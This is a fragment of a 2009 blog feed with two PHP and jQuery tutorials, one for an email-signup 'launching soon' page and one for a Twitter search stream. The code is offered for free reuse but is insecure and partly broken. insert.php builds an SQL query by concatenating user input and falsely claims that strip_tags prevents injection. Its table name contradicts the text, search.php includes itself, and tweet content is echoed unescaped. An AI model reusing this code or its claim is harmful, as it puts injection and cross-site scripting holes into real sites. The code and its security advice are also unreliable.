font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;'value'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;$.ajax&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;({&lt;/span&gt;&lt;br /&gt;type&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"POST"&lt;/span&gt;,&lt;br /&gt;url&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;"insert.php"&lt;/span&gt;,&lt;br /&gt;data&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"input_leave_email="+&lt;/span&gt; input_leave_email,&lt;br /&gt;success&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;:&lt;/span&gt; &lt;span style="font-weight: bold;"&gt;function&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(){&lt;/span&gt;&lt;br /&gt;$(&lt;span style="color: rgb(51, 102, 255);"&gt;"#submit_leave_email"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.fadeOut&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt;$(&lt;span style="color: rgb(51, 102, 255);"&gt;"#update_success"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.fadeIn&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;  });&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;return false;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt; });&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;});&lt;/span&gt;&lt;/div&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. insert.php&lt;/strong&gt;&lt;br /&gt;&lt;strong&gt;&lt;/strong&gt;&lt;em&gt;insert.php&lt;/em&gt; contains some lines of PHP code to insert an email address into a database table. In this example I created a table &lt;span style="color: rgb(0, 0, 153);font-family:courier new;" &gt;EMAIL&lt;/span&gt; with just one attribute &lt;span style="color: rgb(0, 0, 153);"&gt;"email"&lt;/span&gt;. PHP code is very simple:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&amp;lt;?php&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if&lt;/span&gt;&lt;span style="color: rgb(51, 51, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;isset&lt;/span&gt;&lt;span style="color: rgb(51, 51, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'input_leave_email'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;])){&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;/* Connection to Database */&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;include&lt;/span&gt;(&lt;span style="color: rgb(204, 0, 0);"&gt;'config.php'&lt;/span&gt;)&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;/* Remove HTML tag to prevent query injection */&lt;/span&gt;&lt;br /&gt;$email &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; strip_tags&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'input_leave_email'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;])&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$sql &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'INSERT INTO WALL (email) VALUES(&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;    "'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$email&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'")'&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;mysql_query&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$sql&lt;span style="color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; $email;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;else&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;{&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'0'&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;;&lt;/span&gt; &lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;?&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;Now, remember to modify your database connection parameters in &lt;span style="font-weight: bold;"&gt;config.php&lt;/span&gt; and upload all files on your testing server. Than load&lt;span style="font-weight: bold;"&gt; index.php&lt;/span&gt; and see the result!&lt;br /&gt;&lt;br /&gt;Take a look at the &lt;a href="http://woorktuts.110mb.com/launchingsoonpage/"&gt;live preview here&lt;/a&gt;.&lt;br /&gt;&lt;br /&gt;That's all! &lt;a href="http://www.box.net/shared/i6fr5xqy79"&gt;Download the source code&lt;/a&gt;  of this tutorial you can customize and reuse in your web project for free! Leave a comment for your suggestions, thanks!&lt;div class="blogger-post-footer"&gt;&lt;img width='1' height='1' src='https://blogger.googleusercontent.com/tracker/4284377048633026062-6300420301875771550?l=infinitytricks.blogspot.com' alt='' /&gt;&lt;/div&gt;</content><link rel='replies' type='application/atom+xml' href='http://infinitytricks.blogspot.com/feeds/6300420301875771550/comments/default' title='Post Comments'/><link rel='replies' type='text/html' href='http://www.blogger.com/comment.g?blogID=4284377048633026062&amp;postID=6300420301875771550' title='0 Comments'/><link rel='edit' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6300420301875771550'/><link rel='self' type='application/atom+xml' href='http://www.blogger.com/feeds/4284377048633026062/posts/default/6300420301875771550'/><link rel='alternate' type='text/html' href='http://infinitytricks.blogspot.com/2009/07/how-to-implement-launching-soon-page.html' title='How to implement a launching soon page with PHP and jQuery'/><author><name>Lovana das</name><uri>http://www.blogger.com/profile/03880679332199590678</uri><email>noreply@blogger.com</email><gd:image rel='http://schemas.google.com/g/2005#thumbnail' width='16' height='16' src='http://img2.blogblog.com/img/b16-rounded.gif'/></author><media:thumbnail xmlns:media='http://search.yahoo.com/mrss/' url='http://lh4.ggpht.com/_TqPdHmAEwTM/Skj68E0n1II/AAAAAAAAE0w/fzKp0pt9GxA/s72-c/launchsoon2.png' height='72' width='72'/><thr:total>0</thr:total></entry><entry><id>tag:blogger.com,1999:blog-4284377048633026062.post-7557802152456107923</id><published>2009-07-28T20:10:00.001-07:00</published><updated>2009-07-28T20:10:58.925-07:00</updated><title type='text'>Twitter API: How to create a stream of messages Monitter-like with PHP and jQuery</title><content type='html'>This tutorial illustrates a very simple way to work with the Twitter API in order to implement a search in the Twitter public timeline and display search results with an animated stream of messages (tweets) similar to &lt;a href="http://monitter.com/"&gt;Monitter&lt;/a&gt;. In this example I used PHP, jQuery and a very useful Twitter Search API for PHP based on the work of &lt;a href="http://davidbillingham.name/"&gt;David Billingham&lt;/a&gt; and actually developed by &lt;a href="http://twitter.com/ryanfaerman"&gt;Ryan Faerman&lt;/a&gt;. This implementation is very simple to customize and integrate on your project. The result is something linke this:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh3.ggpht.com/_TqPdHmAEwTM/Slm_l9eKfxI/AAAAAAAAFVo/FzPykgQs5YA/stream3.jpg" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;You can &lt;a href="http://www.box.net/shared/vpjkvo4oe1"&gt;download the full code here&lt;/a&gt; and reuse it for free on your projects.&lt;br /&gt;&lt;br /&gt;&lt;a href="http://www.box.net/shared/vpjkvo4oe1"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/Sg_-cg8AxKI/AAAAAAAAEEA/xKmP9-LvnEQ/download.png" align="absmiddle" border="0" /&gt;&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;I suggest you to take also a look at these posts:&lt;br /&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2009/06/simple-php-twitter-search-ready-to-use.html"&gt;Simple PHP Twitter Search ready to use in your web projects&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2009/06/super-simple-way-to-work-with-twitter.html"&gt;Super simple way to work with Twitter API (PHP + CSS)&lt;/a&gt;&lt;br /&gt;- &lt;a href="http://woork.blogspot.com/2007/10/twitter-send-message-from-php-page.html"&gt;Send messages from a PHP page using Twitter API&lt;/a&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;1. A little introduction&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;This package contains the following files:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh6.ggpht.com/_TqPdHmAEwTM/SlnE7Q1jbQI/AAAAAAAAFVs/KWUJ_jHCsmk/stream4.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;index.php&lt;/span&gt;&lt;/em&gt;: page with the search form + search results&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;search.php&lt;/span&gt;&lt;/em&gt;: PHP search&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;twitterapi.php&lt;/span&gt;&lt;/em&gt;: Twitter Search API for PHP&lt;br /&gt;- &lt;em&gt;&lt;span style="font-weight: bold;"&gt;jquery/jquery-1.3.2.min.js&lt;/span&gt;&lt;/em&gt;: jQuery framework&lt;br /&gt;&lt;br /&gt;How it works? After submission the search form calls an ajax request to the page &lt;em&gt;&lt;span style="font-weight: bold;"&gt;search.php&lt;/span&gt;&lt;/em&gt; that returns search results into an array. Each element of the array (every single tweet) appears into the div &lt;em&gt;&lt;span style="font-weight: bold;"&gt;twitter-results&lt;/span&gt;&lt;/em&gt; with a nice fade-in effect. I set a delay between each tweet equal 2 seconds (2000 ms).&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/Slm5qWTBhYI/AAAAAAAAFVY/TNiEaxgkZoA/stream1.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;I suggest  you to take a look at &lt;a href="http://monitter.com/"&gt;Monitter&lt;/a&gt;, and &lt;a href="http://www.box.net/shared/vpjkvo4oe1"&gt;download the full code&lt;/a&gt; to try this tutorial on your local host. Now, take a look at the code.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;2. index.php: HTML code&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;HTML code is very simple. Copy the following code in the tag &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;body&amp;gt;&lt;/span&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div class=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twitter_container"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;form id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twittersearch"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;method=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"post"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;action=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;""&lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;input name=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twitterq"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text" &lt;/span&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twitterq"&lt;/span&gt; &lt;span style="color: rgb(255, 102, 0);"&gt;/&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;button type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"submit"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&lt;/span&gt;Search&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/button&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(255, 102, 0);"&gt;&amp;lt;/form&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;div id=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"twitter-results"&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;&amp;lt;/div&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;...and add into the tag &lt;span style="font-weight: bold; color: rgb(0, 0, 153);font-family:courier new;" &gt;&amp;lt;head&amp;gt;&lt;/span&gt; of the page a link to jQuery:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;src=&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"jquery.js"&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;gt;&amp;lt;/script&amp;gt;&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;The result is a simple search form:&lt;br /&gt;&lt;br /&gt;&lt;div style="text-align: center;"&gt;&lt;img src="http://lh4.ggpht.com/_TqPdHmAEwTM/Slm9VrbEzyI/AAAAAAAAFVg/BaTUtjVsiGs/stream2.png" /&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;3. search.php&lt;/strong&gt;&lt;br /&gt;Now copy and paste the following code into &lt;em&gt;&lt;span style="font-weight: bold;"&gt;search.php&lt;/span&gt;&lt;/em&gt;:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;&amp;lt;?php &lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;include&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'search.php'&lt;/span&gt;);&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;if&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'twitterq'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;]&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;   $twitter_query &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;$_POST&lt;span style="color: rgb(0, 0, 153);"&gt;[&lt;/span&gt;&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'twitterq'&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;]&lt;/span&gt;;&lt;br /&gt;$search &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(0, 153, 0);"&gt;new&lt;/span&gt; TwitterSearch&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$twitter_query&lt;span style="color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;$results&lt;/span&gt; &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $search&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;results&lt;span style="color: rgb(0, 0, 153);"&gt;()&lt;/span&gt;;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;foreach&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$results &lt;span style="color: rgb(0, 153, 0);"&gt;as&lt;/span&gt; $result&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;           &lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;div class="twitter_status"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;img src="'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;profile_image_url.&lt;span style="color: rgb(204, 0, 0);"&gt;'" class="twitter_image"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;$text_n &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; toLink($result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;text);&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; $text_n;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;div class="twitter_small"&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;strong&amp;gt;From:&amp;lt;/strong&amp;gt; &amp;lt;a href="http://www.twitter.com/'&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;from_user&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;'"&amp;gt;'.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;from_user.&lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;/a&gt;: '&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;strong&amp;gt;at:&amp;lt;/strong&amp;gt; '&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(51, 102, 255);"&gt;.&lt;/span&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;created_at;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt;&lt;span style="color: rgb(204, 0, 0);"&gt; '&amp;lt;/div&amp;gt;'&lt;/span&gt;;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;echo&lt;/span&gt; &lt;span style="color: rgb(204, 0, 0);"&gt;'&amp;lt;/div&amp;gt;'&lt;/span&gt;;&lt;/div&gt;   &lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(255, 0, 0);"&gt;?&amp;gt;&lt;/span&gt;&lt;br /&gt;&lt;/div&gt;&lt;br /&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;font-family:courier new;" &gt;$result &lt;/span&gt;is the array that contains search results. To display all elements of the array (search results) I used this simple loop:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(0, 153, 0);"&gt;foreach&lt;/span&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;$results &lt;span style="color: rgb(0, 153, 0);"&gt;as&lt;/span&gt; $result&lt;span style="color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;br /&gt;...&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;}&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;... and to get a specific attribute of the array I used this simple code:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;$result&lt;span style="color: rgb(51, 102, 255);"&gt;-&gt;&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;name_of_element&lt;/span&gt;&lt;/div&gt;&lt;br /&gt;Take a look at &lt;a href="http://woork.blogspot.com/2009/06/simple-php-twitter-search-ready-to-use.html"&gt;this post&lt;/a&gt; for info about the search on Twitter.&lt;br /&gt;&lt;br /&gt;&lt;br /&gt;&lt;strong&gt;4. index.php: JavaScript Code&lt;/strong&gt;&lt;br /&gt;&lt;br /&gt;Now take a look at the following JavaScript code that enables an ajax request for the search and display results into the page index.php with a fade in effect and a delay between each tweet equal to 2 seconds:&lt;br /&gt;&lt;br /&gt;&lt;div class="code"&gt;&lt;span style="color: rgb(204, 0, 0);"&gt;&amp;lt;script type=&lt;span style="color: rgb(51, 102, 255);"&gt;"text/javascript"&lt;/span&gt;&amp;gt;&lt;/span&gt;&lt;br /&gt;$(&lt;span style="color: rgb(204, 51, 204);"&gt;document&lt;/span&gt;).ready&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 0);"&gt;function&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; twitterq = &lt;span style="color: rgb(51, 102, 255);"&gt;''&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;;&lt;/span&gt;&lt;br /&gt;&lt;div style="margin-left: 14px;"&gt;&lt;br /&gt;&lt;span style="font-weight: bold;"&gt;function&lt;/span&gt; displayTweet&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(){&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; i &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(255, 0, 0);"&gt;0&lt;/span&gt;;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; limit &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; $&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"#twitter-results &gt; div"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.size&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;();&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; myInterval &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt; &lt;span style="color: rgb(204, 51, 204);"&gt;window&lt;/span&gt;.&lt;span style="color: rgb(51, 153, 153);"&gt;setInterval&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;function &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;var&lt;/span&gt; element &lt;span style="color: rgb(51, 102, 255);"&gt;=&lt;/span&gt;  $&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"#twitter-results div:last-child"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"#twitter-results"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.prepend&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;element&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;element.fadeIn&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"slow"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;&lt;span style="color: rgb(0, 0, 0);"&gt;i&lt;/span&gt;++&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;if(&lt;/span&gt;i&lt;span style="color: rgb(51, 102, 255);"&gt;==&lt;/span&gt;limit&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;){&lt;/span&gt;&lt;div style="margin-left: 14px;"&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;window&lt;/span&gt;.&lt;span style="color: rgb(51, 153, 153);"&gt;setTimeout&lt;/span&gt;&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;function&lt;/span&gt; &lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;() {&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(204, 51, 204);"&gt;clearInterval&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;myInterval&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;        });&lt;/span&gt;&lt;/div&gt;       &lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;}&lt;/span&gt;&lt;br /&gt;&lt;span style="color: rgb(0, 0, 153); font-weight: bold;"&gt;   }&lt;/span&gt;,&lt;span style="color: rgb(255, 0, 0);"&gt;2000&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;);&lt;/span&gt;&lt;br /&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt; }&lt;/span&gt;&lt;br /&gt;&lt;br /&gt;$&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;(&lt;/span&gt;&lt;span style="color: rgb(51, 102, 255);"&gt;"form#twittersearch"&lt;/span&gt;&lt;span style="font-weight: bold; color: rgb(0, 0, 153);"&gt;)&lt;/span&gt;.submit&lt;span style="font-weight: bold;"&gt;&lt;span style="color: rgb(0, 0, 